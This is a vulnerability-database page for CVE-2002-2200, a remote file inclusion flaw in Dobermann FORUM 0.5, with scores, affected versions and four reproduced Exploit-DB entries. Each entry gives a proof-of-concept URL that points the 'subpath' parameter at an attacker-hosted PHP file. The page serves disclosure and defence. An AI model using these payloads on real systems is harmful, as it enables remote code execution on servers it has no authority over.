CVE-2002-2200
published 2002-12-31CVE-2002-2200: Benjamin Lefevre Dobermann FORUM 0.5 and earlier allows remote attackers to remotely include and execute malicious PHP files via the "subpath" variablein (1)…
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.12%
93.5th percentile
Benjamin Lefevre Dobermann FORUM 0.5 and earlier allows remote attackers to remotely include and execute malicious PHP files via the "subpath" variablein (1) entete.php, (2) enteteacceuil.php, (3) index.php, or (4) newtopic.php.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| benjamin_lefevre | dobermann_forum | — | — |
| benjamin_lefevre | dobermann_forum | — | — |
| benjamin_lefevre | dobermann_forum | — | — |
| benjamin_lefevre | dobermann_forum | — | — |
| benjamin_lefevre | dobermann_forum | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Benjamin Lefevre Dobermann Forum 0.x - 'enteteacceuil.php?subpath' Remote File Inclusion
exploitdb·2002-10-28
CVE-2002-2200 Benjamin Lefevre Dobermann Forum 0.x - 'enteteacceuil.php?subpath' Remote File Inclusion
Benjamin Lefevre Dobermann Forum 0.x - 'enteteacceuil.php?subpath' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/6057/info
Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter.
http://[target]/enteteacceuil.php?subpath=http://[attacker]/banniere.php
Exploit-DB
Benjamin Lefevre Dobermann Forum 0.x - 'index.php?subpath' Remote File Inclusion
exploitdb·2002-10-28
CVE-2002-2200 Benjamin Lefevre Dobermann Forum 0.x - 'index.php?subpath' Remote File Inclusion
Benjamin Lefevre Dobermann Forum 0.x - 'index.php?subpath' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/6057/info
Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter.
http://[target]/index.php?subpath=http://[attacker]/banniere.php
Exploit-DB
Benjamin Lefevre Dobermann Forum 0.x - 'entete.php?subpath' Remote File Inclusion
exploitdb·2002-10-28
CVE-2002-2200 Benjamin Lefevre Dobermann Forum 0.x - 'entete.php?subpath' Remote File Inclusion
Benjamin Lefevre Dobermann Forum 0.x - 'entete.php?subpath' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/6057/info
Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter.
http://[target]/entete.php?subpath=http://[attacker]/banniere.php
http://[target]/topic/entete.php?subpath=http://[attacker]/banniere.php
Exploit-DB
Benjamin Lefevre Dobermann Forum 0.x - 'newtopic.php?subpath' Remote File Inclusion
exploitdb·2002-10-28
CVE-2002-2200 Benjamin Lefevre Dobermann Forum 0.x - 'newtopic.php?subpath' Remote File Inclusion
Benjamin Lefevre Dobermann Forum 0.x - 'newtopic.php?subpath' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/6057/info
Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter.
http://[target]/newtopic.php?subpath=http://[attacker]/banniere.php
No writeups or analysis indexed.
2002-12-31
Published